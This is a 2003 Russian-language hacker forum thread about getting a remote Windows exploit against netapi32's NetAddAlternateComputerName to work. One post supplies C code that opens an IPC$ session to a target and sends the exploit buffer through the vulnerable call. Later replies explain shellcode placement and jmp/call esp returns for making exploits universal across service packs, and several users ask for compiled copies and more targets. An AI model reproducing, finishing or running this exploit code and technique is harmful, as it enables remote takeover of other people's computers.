Цитата | ||
---|---|---|
Victor пишет:
Попробуй hInstance = LoadLibrary("netapi32.dll"); |
не подскажите куда именно запихнуть... ?
а то я не в ладах с си. :}
14.12.2003 10:18:24
Если вы не в ладах с СИ зачем вам экплоит? Что и куда запихнуть можно понять из предыдущих версий wirepair и WKS - сделать загрузку библиотек вместо NetAddAltCompName. А если не соображаете в С ждите пока какой-нибудь ****** выложит kaht3
Скомпиленная версия от wirepair кстати давно есть - практически не на много уступает этому. |
|
|
|
14.12.2003 11:59:53
typedef int (WINAPI * ADDALTCN) (wchar_t*, wchar_t*, void*, void*, long);
HINSTANCE hNetApi; ADDALTCN fnNetAdd = NULL; char szNetApi[] = "netapi32.dll"; char szNetAdd[] = "NetAddAlternateComputerName"; // ------------------------------------------------ //void NetAddAlternateComputerName(wchar_t *Server, wchar_t *AlternateName, wchar_t * DomainAccount, // &nbs p; &nbs p;wchar_t *DomainAccountPassword, unsigned int Reserved); void send_exp(void* dump) { NETRESOURCE _IPC_; _IPC_.lpLocalName = NULL; _IPC_.lpProvider = NULL; _IPC_.dwType = RESOURCETYPE_ANY; _IPC_.lpRemoteName = (char*)&ipc; printf("[+] Setting up IPC$ session...\n"); if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) { printf("[x] Couldn't establish IPC$ connection.\n"); exit (1); } printf("[*] IPC$ session setup successfully!\n"); printf("[+] Sending exploit ...\n"); printf("[+] loading '%s' library...\n", szNetApi); hNetApi = LoadLibrary(szNetApi); if (hNetApi == NULL) { printf("[-] '%s' not loaded\n", szNetApi); //return 1; } printf("[+] loaded at %p\n", hNetApi); printf("[+] locating '%s' function...\n", szNetAdd); fnNetAdd = (ADDALTCN) GetProcAddress(hNetApi, szNetAdd); if (fnNetAdd == NULL) { printf("[-] '%s' not found\n", szNetAdd); //return 1; } printf("[+] located at %p\n", fnNetAdd); //printf("[+] connecting to '%s'...\n", hostname); int stat = fnNetAdd(tgt_net_uni, expl_uni ,NULL,NULL,0); printf("[+] sent (status: %d)\n", stat); //NetAddAlternateComputerName( ); //NetAddAlternateComputerName( ); // ka-a-a b0-0-0-ms // } |
|
|
|
14.12.2003 13:11:28
зря ты это.. теперь завалят вопросами куда это вставить=)
|
|
|
|
14.12.2003 19:31:22
да и куда это вставить ?
P.S. Ржевский молчать............... |
|
|
|
15.12.2003 00:04:55
НЕ В КОЕМ СЛУЧАЕ НИКУДА НЕ ВСТАВЛЯЙТЕ!!! ЭТО ТРОЯНСКИЙ КОД КОТОРЫЙ ВЫШЛЕТ ВСЕ ВАШИ ПАРОЛИ НА МЫЛО ЗЛОБНОМУ ХАТСКЕРУ И ОТФОРМАТИРУЕТ ВИНЧЕСТЕР!!! Я ПРЕДУПРЕДИЛ И ПОТОМ НЕ ПЛАЧТЕ!!!
|
|
|
|
15.12.2003 09:04:25
)) Прикололся! [IMG] |
|||
|
|
15.12.2003 09:29:30
Roger that!!!))
|
|
|
|
15.12.2003 12:51:02
Вы бы товарищи юмористы лучше б этот эксплоит дополнили таргетами к xp sp0 eng, xp sp1 eng. Для w2k неплохо бы.
Вопрос к знающим, шеллкод в эксплоитах(как вообще, так и в данном случае) универсален, и требуется только подобрать правильный адрес на него, или в шеллкоде тоже зашиты какие-то ОС-зависимые адреса? Второй вопрос, если у разных версий ОС различные адреса, то как пишут универсальные эксплоиты? Ведь управление на шелл передается по адресу который раньше был адресом возврата(в стеке), а стал адресом шелла. |
|
|
|
16.12.2003 01:41:40
abakan
А почему тебе бы самому не разобраться и не добавить? У того кому нужно уже оно есть - универсальный к xp pro eng sp0/sp1.Для W2k таргета в данном случае никогда не будет, т.к. это уже было разжевано почему именно так. > шеллкод в эксплоитах(как вообще, так и в данном случае) > универсален, и требуется только подобрать правильный > адрес на него, или в шеллкоде тоже зашиты какие-то > ОС-зависимые адреса? Адреса подбирать не нужно - нужно разобраться по какому смещению относительно какого-нибуть из регистров будет лежать шеллкод после возврата из уязвимой ф-ции в к-рой происходит переполнение. > Ведь управление на шелл передается по адресу который > раньше был адресом возврата(в стеке), а стал адресом > шелла. Возврат никогда не происходит прямо на шеллкод - часто, как и в данному случае, он происходит на инструкцию jmp/call esp, jmp /call eax и т.п, к-рые указывают в момент переполнения на шеллкод. А уже адрес этого перехода может зависеть или не зависеть от версии уязвимой программы(если инструкция перехода на шеллкод выбрана в ней) или ОС(если инструкция перехода в одной из библиотек ОС). Если инструкция перехода находится в библиотеке ОС по одному и тому же адресу в разных версиях SP, то имеем универсальный эксплоит для ОС с любыми SP. Если же инструкция перехода - в коде уязвимой программы, то имеем универсальный эксплоит для семейства ОС, но под конкретную версию уязвимой программы. |
|
|
|
16.12.2003 15:28:33
Nosecret thx !
все исправил ,теперь вопрос параметр -t (0-5) имеет значение ??? |
|
|
|
17.12.2003 07:34:27
<font face="Verdana, Arial, Helvetica, sans-serif">Кто занялся партированием на пингвинятинку ?</font>
|
|
|
|
17.12.2003 08:30:59
прочитайте
и портируйте наздоровие хоть под над нанайско-турецкий ZX Spectrum [IMG] |
|
|
|
17.12.2003 15:57:31
Help кто нибудь
Уже всё перепробовал, а _optarg и _getopt всё равно undefined [IMG] Подскажите, что с ними делать? ОЧЕНЬ нужно. а кому не лень - ответьте |
|
|
|
17.12.2003 16:53:02
ОГРОМНАЯ ПРОСЬБА: скиньте откомпиленный эксплоит мне на мыло: shanker@mail.ru
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
|
|
|
17.12.2003 17:01:01
Кто-то обещал сделать сплоит с графическим интерфейсом!
Ждем-с!!!
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
|
|
|
17.12.2003 19:08:12
Отошли мне пожалуста компилированую версию, spaut@yandex.ru
|
|
|
|
17.12.2003 20:13:59
Всё ошибки исправил, а как библиотеку gdbm в lcc подключить?
|
|
|
|
18.12.2003 14:37:49
у меня уже есть [IMG] |
|||
|
|
18.12.2003 17:33:27
[/QUOTE] зачем сплойт просто оболочку.
у меня уже есть [IMG] Может, поделишься?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
||||
|
|
|||